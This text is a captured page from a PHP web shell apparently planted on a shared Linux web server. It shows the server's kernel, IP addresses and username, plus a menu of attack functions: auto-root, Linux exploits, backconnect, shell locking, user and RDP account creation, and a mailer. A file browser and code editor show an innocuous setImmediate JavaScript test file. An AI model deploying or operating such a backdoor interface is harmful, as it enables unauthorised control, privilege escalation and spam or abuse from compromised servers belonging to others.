Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.171
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
node-setimmediate /
examples /
[ HOME SHELL ]
Name
Size
Permission
Action
index.html
614
B
-rw-r--r--
selfClose.htm
345
B
-rw-r--r--
setImmediate.js
6.37
KB
-rw-r--r--
tests.js
1.27
KB
-rw-r--r--
worker.js
93
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : tests.js
/*"use strict";*/ /*global setImmediate: false, specify: false, window: false */ function assert(condition) { if (!condition) { throw new Error("Assertion failed"); } } assert.strictEqual = function (x, y) { if (x !== y) { throw new Error(x + " !== " + y); } }; it("Modal dialogs block handlers", function (done) { // Try to launch the less-annoying self-closing-window modal dialog; if that's not an option, fall back to alert. var showTheDialog = window.showModalDialog ? function () { window.showModalDialog("selfClose.htm"); } : function () { window.alert("Please press OK to continue the test; we needed a modal dialog."); }; var dialogClosed = false; setImmediate(function () { showTheDialog(); dialogClosed = true; }); setImmediate(function () { assert(dialogClosed); done(); }); }); if (typeof window.Worker === "function") { it("When inside a web worker context, setImmediate calls the passed handler", function (done) { var worker = new window.Worker("worker.js"); worker.addEventListener("message", function (event) { assert.strictEqual(event.data, "TEST"); done(); }, false); }); }
Close